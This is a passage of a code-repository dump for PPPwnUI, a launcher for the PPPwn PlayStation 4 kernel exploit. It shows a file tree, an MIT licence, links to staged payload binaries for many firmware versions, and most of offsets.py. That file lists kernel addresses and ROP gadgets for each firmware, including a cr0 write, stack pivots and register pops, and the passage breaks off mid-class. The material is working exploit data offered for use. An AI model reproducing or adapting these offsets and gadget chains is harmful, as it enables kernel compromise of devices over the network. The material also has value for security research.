├── LICENSE ├── PPPwn ├── goldhen │ ├── 900 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 960 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 1000 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 1001 │ │ ├── stage1.bin │ │ └── stage2.bin │ └── 1100 │ │ ├── stage1.bin │ │ └── stage2.bin ├── hen │ ├── 755 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 800 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 803 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 850 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 852 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 900 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 903 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 904 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 1000 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 1001 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 1050 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 1070 │ │ ├── stage1.bin │ │ └── stage2.bin │ ├── 1071 │ │ ├── stage1.bin │ │ └── stage2.bin │ └── 1100 │ │ ├── stage1.bin │ │ └── stage2.bin ├── linux │ ├── stage1-1100.bin │ ├── stage2-1100-1gb.bin │ ├── stage2-1100-2gb.bin │ ├── stage2-1100-3gb.bin │ └── stage2-1100-4gb.bin ├── offsets.py ├── pppwn.py ├── pppwn_cpp ├── pppwn_cpp.exe ├── pppwn_go ├── pppwn_go.exe ├── stage1 │ ├── 700 │ │ └── stage1.bin │ ├── 701 │ │ └── stage1.bin │ ├── 702 │ │ └── stage1.bin │ ├── 750 │ │ └── stage1.bin │ ├── 751 │ │ └── stage1.bin │ ├── 755 │ │ └── stage1.bin │ ├── 800 │ │ └── stage1.bin │ ├── 801 │ │ └── stage1.bin │ ├── 803 │ │ └── stage1.bin │ ├── 850 │ │ └── stage1.bin │ ├── 852 │ │ └── stage1.bin │ ├── 900 │ │ └── stage1.bin │ ├── 903 │ │ └── stage1.bin │ ├── 904 │ │ └── stage1.bin │ ├── 950 │ │ └── stage1.bin │ ├── 951 │ │ └── stage1.bin │ ├── 960 │ │ └── stage1.bin │ ├── 1000 │ │ └── stage1.bin │ ├── 1001 │ │ └── stage1.bin │ ├── 1050 │ │ └── stage1.bin │ ├── 1070 │ │ └── stage1.bin │ ├── 1071 │ │ └── stage1.bin │ └── 1100 │ │ └── stage1.bin └── stage2 │ ├── 700 │ └── stage2.bin │ ├── 701 │ └── stage2.bin │ ├── 702 │ └── stage2.bin │ ├── 750 │ └── stage2.bin │ ├── 751 │ └── stage2.bin │ ├── 755 │ └── stage2.bin │ ├── 800 │ └── stage2.bin │ ├── 801 │ └── stage2.bin │ ├── 803 │ └── stage2.bin │ ├── 850 │ └── stage2.bin │ ├── 852 │ └── stage2.bin │ ├── 900 │ └── stage2.bin │ ├── 903 │ └── stage2.bin │ ├── 904 │ └── stage2.bin │ ├── 950 │ └── stage2.bin │ ├── 951 │ └── stage2.bin │ ├── 960 │ └── stage2.bin │ ├── 1000 │ └── stage2.bin │ ├── 1001 │ └── stage2.bin │ ├── 1050 │ └── stage2.bin │ ├── 1070 │ └── stage2.bin │ ├── 1071 │ └── stage2.bin │ └── 1100 │ └── stage2.bin ├── PPPwnUI.bat ├── PPPwnUI.py ├── PPPwnUI.sh ├── README.md ├── USB Drive (GoldHEN_v2.4b17.3) └── goldhen.bin ├── media └── logo.ico └── requirements.txt /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (C) 2024 Memz 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /PPPwn/goldhen/1000/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/goldhen/1000/stage1.bin -------------------------------------------------------------------------------- /PPPwn/goldhen/1000/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/goldhen/1000/stage2.bin -------------------------------------------------------------------------------- /PPPwn/goldhen/1001/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/goldhen/1001/stage1.bin -------------------------------------------------------------------------------- /PPPwn/goldhen/1001/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/goldhen/1001/stage2.bin -------------------------------------------------------------------------------- /PPPwn/goldhen/1100/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/goldhen/1100/stage1.bin -------------------------------------------------------------------------------- /PPPwn/goldhen/1100/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/goldhen/1100/stage2.bin -------------------------------------------------------------------------------- /PPPwn/goldhen/900/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/goldhen/900/stage1.bin -------------------------------------------------------------------------------- /PPPwn/goldhen/900/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/goldhen/900/stage2.bin -------------------------------------------------------------------------------- /PPPwn/goldhen/960/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/goldhen/960/stage1.bin -------------------------------------------------------------------------------- /PPPwn/goldhen/960/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/goldhen/960/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/1000/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1000/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/1000/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1000/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/1001/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1001/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/1001/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1001/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/1050/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1050/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/1050/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1050/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/1070/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1070/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/1070/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1070/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/1071/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1071/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/1071/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1071/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/1100/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1100/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/1100/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/1100/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/755/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/755/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/755/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/755/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/800/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/800/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/800/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/800/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/803/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/803/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/803/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/803/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/850/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/850/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/850/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/850/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/852/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/852/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/852/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/852/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/900/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/900/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/900/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/900/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/903/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/903/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/903/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/903/stage2.bin -------------------------------------------------------------------------------- /PPPwn/hen/904/stage1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/904/stage1.bin -------------------------------------------------------------------------------- /PPPwn/hen/904/stage2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/hen/904/stage2.bin -------------------------------------------------------------------------------- /PPPwn/linux/stage1-1100.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/linux/stage1-1100.bin -------------------------------------------------------------------------------- /PPPwn/linux/stage2-1100-1gb.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/linux/stage2-1100-1gb.bin -------------------------------------------------------------------------------- /PPPwn/linux/stage2-1100-2gb.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/linux/stage2-1100-2gb.bin -------------------------------------------------------------------------------- /PPPwn/linux/stage2-1100-3gb.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/linux/stage2-1100-3gb.bin -------------------------------------------------------------------------------- /PPPwn/linux/stage2-1100-4gb.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/B-Dem/PPPwnUI/128a4459066111c262043a937ce4f591fc907a95/PPPwn/linux/stage2-1100-4gb.bin -------------------------------------------------------------------------------- /PPPwn/offsets.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2024 Andy Nguyen 2 | # 3 | # This software may be modified and distributed under the terms 4 | # of the MIT license. See the LICENSE file for details. 5 | 6 | # FW 7.00 / 7.01 / 7.02 7 | class OffsetsFirmware_700_702: 8 | PPPOE_SOFTC_LIST = 0xffffffff844ad838 9 | 10 | KERNEL_MAP = 0xffffffff843c8ee0 11 | 12 | SETIDT = 0xffffffff82692400 13 | 14 | KMEM_ALLOC = 0xffffffff823170f0 15 | KMEM_ALLOC_PATCH1 = 0xffffffff823171be 16 | KMEM_ALLOC_PATCH2 = 0xffffffff823171c6 17 | 18 | MEMCPY = 0xffffffff8222f040 19 | 20 | # 0xffffffff82660609 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret 21 | MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823b7169 22 | 23 | SECOND_GADGET_OFF = 0x3b 24 | 25 | # 0xffffffff822f52ed : jmp qword ptr [rsi + 0x3b] 26 | FIRST_GADGET = 0xffffffff822f52ed 27 | 28 | # 0xffffffff82c72e66 : push rbp ; jmp qword ptr [rsi] 29 | PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c928d6 30 | 31 | # 0xffffffff82699bc1 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] 32 | POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff82699bc1 33 | 34 | # 0xffffffff82945dc6 : lea rsp, [rsi + 0x20] ; repz ret 35 | LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82945dc6 36 | 37 | # 0xffffffff826d56ad : add rsp, 0x28 ; pop rbp ; ret 38 | ADD_RSP_28_POP_RBP_RET = 0xffffffff826d56ad 39 | 40 | # 0xffffffff8252a48a : add rsp, 0xb0 ; pop rbp ; ret 41 | ADD_RSP_B0_POP_RBP_RET = 0xffffffff8252a48a 42 | 43 | # 0xffffffff822005a1 : ret 44 | RET = 0xffffffff822005a1 45 | 46 | # 0xffffffff8255325a : pop rdi ; ret 47 | POP_RDI_RET = 0xffffffff8255325a 48 | 49 | # 0xffffffff8230d34e : pop rsi ; ret 50 | POP_RSI_RET = 0xffffffff8230d34e 51 | 52 | # 0xffffffff8299ae06 : pop rdx ; ret 53 | POP_RDX_RET = 0xffffffff8299ae06 54 | 55 | # 0xffffffff822563a6 : pop rcx ; ret 56 | POP_RCX_RET = 0xffffffff822563a6 57 | 58 | # 0xffffffff82326dcd : pop r8 ; pop rbp ; ret 59 | POP_R8_POP_RBP_RET = 0xffffffff82326dcd 60 | 61 | # 0xffffffff827d2b4f : pop r12 ; ret 62 | POP_R12_RET = 0xffffffff827d2b4f 63 | 64 | # 0xffffffff82407b54 : pop rax ; ret 65 | POP_RAX_RET = 0xffffffff82407b54 66 | 67 | # 0xffffffff822008f2 : pop rbp ; ret 68 | POP_RBP_RET = 0xffffffff822008f2 69 | 70 | # 0xffffffff82bd348a : push rsp ; pop rsi ; ret 71 | PUSH_RSP_POP_RSI_RET = 0xffffffff82bd348a 72 | 73 | # 0xffffffff822fb490 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax 74 | MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff822fb490 75 | 76 | # 0xffffffff82b910ba : mov byte ptr [rcx], al ; ret 77 | MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b910ba 78 | 79 | # 0xffffffff82644739 : mov rdi, rbx ; call r12 80 | MOV_RDI_RBX_CALL_R12 = 0xffffffff82644739 81 | 82 | # 0xffffffff82644535 : mov rdi, r14 ; call r12 83 | MOV_RDI_R14_CALL_R12 = 0xffffffff82644535 84 | 85 | # 0xffffffff822ad8e1 : mov rsi, rbx ; call rax 86 | MOV_RSI_RBX_CALL_RAX = 0xffffffff822ad8e1 87 | 88 | # 0xffffffff8266a598 : mov r14, rax ; call r8 89 | MOV_R14_RAX_CALL_R8 = 0xffffffff8266a598 90 | 91 | # 0xffffffff82cd2aca : add rdi, rcx ; ret 92 | ADD_RDI_RCX_RET = 0xffffffff82cd2aca 93 | 94 | # 0xffffffff82583b8a : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret 95 | SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82583b8a 96 | 97 | # 0xffffffff82ba226b : jmp r14 98 | JMP_R14 = 0xffffffff82ba226b 99 | 100 | # FW 7.50 / 7.51 / 7.50 101 | class OffsetsFirmware_750_755: 102 | PPPOE_SOFTC_LIST = 0xffffffff8433fcd0 103 | 104 | KERNEL_MAP = 0xffffffff843405b8 105 | 106 | SETIDT = 0xffffffff825d9440 107 | 108 | KMEM_ALLOC = 0xffffffff823753e0 109 | KMEM_ALLOC_PATCH1 = 0xffffffff823754ac 110 | KMEM_ALLOC_PATCH2 = 0xffffffff823754b4 111 | 112 | MEMCPY = 0xffffffff8248f800 113 | 114 | # 0xffffffffe19d9cf9 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret 115 | MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff825a2589 116 | 117 | SECOND_GADGET_OFF = 0x3b 118 | 119 | # 0xffffffff824095e7 : jmp qword ptr [rsi + 0x3b] 120 | FIRST_GADGET = 0xffffffff824095e7 121 | 122 | # 0xffffffff82c90516 : push rbp ; jmp qword ptr [rsi] 123 | PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c90516 124 | 125 | # 0xffffffff82565e21 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] 126 | POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff82565e21 127 | 128 | # 0xffffffff82949bc6 : lea rsp, [rsi + 0x20] ; repz ret 129 | LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82949bc6 130 | 131 | # 0xffffffff826d62fa : add rsp, 0x28 ; pop rbp ; ret 132 | ADD_RSP_28_POP_RBP_RET = 0xffffffff826d62fa 133 | 134 | # 0xffffffff82599199 : add rsp, 0xb0 ; pop rbp ; ret 135 | ADD_RSP_B0_POP_RBP_RET = 0xffffffff82599199 136 | 137 | # 0xffffffff822008f3 : ret 138 | RET = 0xffffffff822008f3 139 | 140 | # 0xffffffff8228c0fc : pop rdi ; ret 141 | POP_RDI_RET = 0xffffffff8228c0fc 142 | 143 | # 0xffffffff82257b77 : pop rsi ; ret 144 | POP_RSI_RET = 0xffffffff82257b77 145 | 146 | # 0xffffffff822f2f1a : pop rdx ; ret 147 | POP_RDX_RET = 0xffffffff822f2f1a 148 | 149 | # 0xffffffff8231312c : pop rcx ; ret 150 | POP_RCX_RET = 0xffffffff8231312c 151 | 152 | # 0xffffffff82227fa7 : pop r8 ; pop rbp ; ret 153 | POP_R8_POP_RBP_RET = 0xffffffff82227fa7 154 | 155 | # 0xffffffff827dc32f : pop r12 ; ret 156 | POP_R12_RET = 0xffffffff827dc32f 157 | 158 | # 0xffffffff8231a01e : pop rax ; ret 159 | POP_RAX_RET = 0xffffffff8231a01e 160 | 161 | # 0xffffffff822008f2 : pop rbp ; ret 162 | POP_RBP_RET = 0xffffffff822008f2 163 | 164 | # 0xffffffff82bd096a : push rsp ; pop rsi ; ret 165 | PUSH_RSP_POP_RSI_RET = 0xffffffff82bd096a 166 | 167 | # 0xffffffff82447f40 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax 168 | MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82447f40 169 | 170 | # 0xffffffff82b8e5ae : mov byte ptr [rcx], al ; ret 171 | MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b8e5ae 172 | 173 | # 0xffffffff8246ce59 : mov rdi, rbx ; call r12 174 | MOV_RDI_RBX_CALL_R12 = 0xffffffff8246ce59 175 | 176 | # 0xffffffff8246cc67 : mov rdi, r14 ; call r12 177 | MOV_RDI_R14_CALL_R12 = 0xffffffff8246cc67 178 | 179 | # 0xffffffff824cd8c1 : mov rsi, rbx ; call rax 180 | MOV_RSI_RBX_CALL_RAX = 0xffffffff824cd8c1 181 | 182 | # 0xffffffff824bdaa8 : mov r14, rax ; call r8 183 | MOV_R14_RAX_CALL_R8 = 0xffffffff824bdaa8 184 | 185 | # 0xffffffff82cd070a : add rdi, rcx ; ret 186 | ADD_RDI_RCX_RET = 0xffffffff82cd070a 187 | 188 | # 0xffffffff8235a377 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret 189 | SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff8235a377 190 | 191 | # 0xffffffff8253f959 : jmp r14 192 | JMP_R14 = 0xffffffff8253f959 193 | 194 | # FW 8.00 / 8.01 / 8.03 195 | class OffsetsFirmware_800_803: 196 | PPPOE_SOFTC_LIST = 0xffffffff84422370 197 | 198 | KERNEL_MAP = 0xffffffff83d243e0 199 | 200 | SETIDT = 0xffffffff82249dd0 201 | 202 | KMEM_ALLOC = 0xffffffff8221b3f0 203 | KMEM_ALLOC_PATCH1 = 0xffffffff8221b4bc 204 | KMEM_ALLOC_PATCH2 = 0xffffffff8221b4c4 205 | 206 | MEMCPY = 0xffffffff8245e1c0 207 | 208 | # 0xffffffff82660609 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret 209 | MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff82660609 210 | 211 | SECOND_GADGET_OFF = 0x3b 212 | 213 | # 0xffffffff82245f1d : jmp qword ptr [rsi + 0x3b] 214 | FIRST_GADGET = 0xffffffff82245f1d 215 | 216 | # 0xffffffff82c72e66 : push rbp ; jmp qword ptr [rsi] 217 | PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c72e66 218 | 219 | # 0xffffffff823b3311 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] 220 | POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff823b3311 221 | 222 | # 0xffffffff8293bb06 : lea rsp, [rsi + 0x20] ; repz ret 223 | LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8293bb06 224 | 225 | # 0xffffffff826aeada : add rsp, 0x28 ; pop rbp ; ret 226 | ADD_RSP_28_POP_RBP_RET = 0xffffffff826aeada 227 | 228 | # 0xffffffff8267b46f : add rsp, 0xb0 ; pop rbp ; ret 229 | ADD_RSP_B0_POP_RBP_RET = 0xffffffff8267b46f 230 | 231 | # 0xffffffff822008e0 : ret 232 | RET = 0xffffffff822008e0 233 | 234 | # 0xffffffff82652d81 : pop rdi ; ret 235 | POP_RDI_RET = 0xffffffff82652d81 236 | 237 | # 0xffffffff82212728 : pop rsi ; ret 238 | POP_RSI_RET = 0xffffffff82212728 239 | 240 | # 0xffffffff82482342 : pop rdx ; ret 241 | POP_RDX_RET = 0xffffffff82482342 242 | 243 | # 0xffffffff82233677 : pop rcx ; ret 244 | POP_RCX_RET = 0xffffffff82233677 245 | 246 | # 0xffffffff823ac6ed : pop r8 ; pop rbp ; ret 247 | POP_R8_POP_RBP_RET = 0xffffffff823ac6ed 248 | 249 | # 0xffffffff8279b42f : pop r12 ; ret 250 | POP_R12_RET = 0xffffffff8279b42f 251 | 252 | # 0xffffffff8223711d : pop rax ; ret 253 | POP_RAX_RET = 0xffffffff8223711d 254 | 255 | # 0xffffffff822008df : pop rbp ; ret 256 | POP_RBP_RET = 0xffffffff822008df 257 | 258 | # 0xffffffff82bb35ba : push rsp ; pop rsi ; ret 259 | PUSH_RSP_POP_RSI_RET = 0xffffffff82bb35ba 260 | 261 | # 0xffffffff82529060 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax 262 | MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82529060 263 | 264 | # 0xffffffff82b7124e : mov byte ptr [rcx], al ; ret 265 | MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b7124e 266 | 267 | # 0xffffffff8232e9ac : mov rdi, rbx ; call r12 268 | MOV_RDI_RBX_CALL_R12 = 0xffffffff8232e9ac 269 | 270 | # 0xffffffff8232e7e7 : mov rdi, r14 ; call r12 271 | MOV_RDI_R14_CALL_R12 = 0xffffffff8232e7e7 272 | 273 | # 0xffffffff823d049e : mov rsi, rbx ; call rax 274 | MOV_RSI_RBX_CALL_RAX = 0xffffffff823d049e 275 | 276 | # 0xffffffff825dc638 : mov r14, rax ; call r8 277 | MOV_R14_RAX_CALL_R8 = 0xffffffff825dc638 278 | 279 | # 0xffffffff82cb305a : add rdi, rcx ; ret 280 | ADD_RDI_RCX_RET = 0xffffffff82cb305a 281 | 282 | # 0xffffffff8266f467 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret 283 | SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff8266f467 284 | 285 | # 0xffffffff82b82393 : jmp r14 286 | JMP_R14 = 0xffffffff82b82393 287 | 288 | # FW 8.50 / 8.52 289 | class OffsetsFirmware_850_852: 290 | PPPOE_SOFTC_LIST = 0xffffffff83dd6018 291 | 292 | KERNEL_MAP = 0xffffffff83e64228 293 | 294 | SETIDT = 0xffffffff82467340 295 | 296 | KMEM_ALLOC = 0xffffffff824199a0 297 | KMEM_ALLOC_PATCH1 = 0xffffffff82419a6c 298 | KMEM_ALLOC_PATCH2 = 0xffffffff82419a74 299 | 300 | MEMCPY = 0xffffffff825a40f0 301 | 302 | # 0xffffffff823ce849 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret 303 | MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823ce849 304 | 305 | SECOND_GADGET_OFF = 0x3b 306 | 307 | # 0xffffffff8237e09d : jmp qword ptr [rsi + 0x3b] 308 | FIRST_GADGET = 0xffffffff8237e09d 309 | 310 | # 0xffffffff82c766e6 : push rbp ; jmp qword ptr [rsi] 311 | PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c766e6 312 | 313 | # 0xffffffff822a3a31 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] 314 | POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822a3a31 315 | 316 | # 0xffffffff829261c6 : lea rsp, [rsi + 0x20] ; repz ret 317 | LEA_RSP_RSI_20_REPZ_RET = 0xffffffff829261c6 318 | 319 | # 0xffffffff826d2a8a : add rsp, 0x28 ; pop rbp ; ret 320 | ADD_RSP_28_POP_RBP_RET = 0xffffffff826d2a8a 321 | 322 | # 0xffffffff82439c6f : add rsp, 0xb0 ; pop rbp ; ret 323 | ADD_RSP_B0_POP_RBP_RET = 0xffffffff82439c6f 324 | 325 | # 0xffffffff822008e0 : ret 326 | RET = 